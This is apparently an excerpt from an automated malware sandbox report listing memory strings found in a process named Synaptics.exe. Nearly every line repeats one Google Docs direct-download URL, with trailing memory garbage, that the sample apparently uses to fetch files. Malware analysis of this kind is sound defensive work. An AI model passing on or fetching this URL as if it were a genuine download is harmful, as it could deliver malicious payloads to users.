                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademe
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetl6
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniy
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo_
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyok
                          Source: Synaptics.exe, 00000004.00000002.2302077647.00000000071F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadent.y
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadents
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader
                          Source: Synaptics.exe, 00000004.00000002.2302077647.00000000071F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadercon
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderse
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2349487470.000000001DAED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloades
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadesolv
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetle
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadex
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadexDfx
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007367000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2321971186.000000000EEDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfS
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfSVlpD
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfron)t
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfy
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgD
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2349487470.000000001DAED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgl
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle-a
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadglkC
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadglq
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2346850361.000000001D9E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgo
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoog
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgp
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgr
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgsw
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgvt2-
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2295363513.0000000005383000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh)
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhe
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhost
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000072BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi%
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi0
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi4
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiA
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiM
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadic
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadices
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadig;
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadigl
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadin$
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadio
                          Source: Synaptics.exe, 00000004.00000002.2302077647.00000000071F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadity
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiver
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiy
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor/j
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2284139607.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007367000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj.
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj/
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj5
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjF
                          Source: Synaptics.exe, 00000004.00000002.2321971186.000000000EF01000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC3A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                          Source: Synaptics.exe, 00000004.00000002.2302077647.00000000071F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkVn
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadktop
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk~
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007227000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                          Source: Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl-S
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlO
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlX
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2346850361.000000001D9E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadla
                          Source: Synaptics.exe, 00000004.00000002.2295363513.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle8
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleme
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlemeLj
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleni=k
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniQ
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleniy
                          Source: Synaptics.exe, 00000004.00000002.2351047160.000000001DBCA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356043485.000000001DDEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadli
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlleme
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2321971186.000000000EEDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.00000000071C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm.vn
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2354766641.000000001DD78000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2356528382.000000001DE5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadme
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2295363513.0000000005383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmi
                          Source: Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmo
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmp
                          Source: Synaptics.exe, 00000004.00000002.2352346675.000000001DC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmpM
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmz
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2324126322.000000000F02B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007319000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007367000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2302077647.0000000007279000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2321971186.000000000EEDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2326518433.000000000F1E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2349487470.000000001DAED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2325143864.000000000F0A4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2320716788.000000000EE42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                          Source: Synaptics.exe, 00000004.00000002.2348080955.000000001DA6D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2323125188.000000000EF86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn-
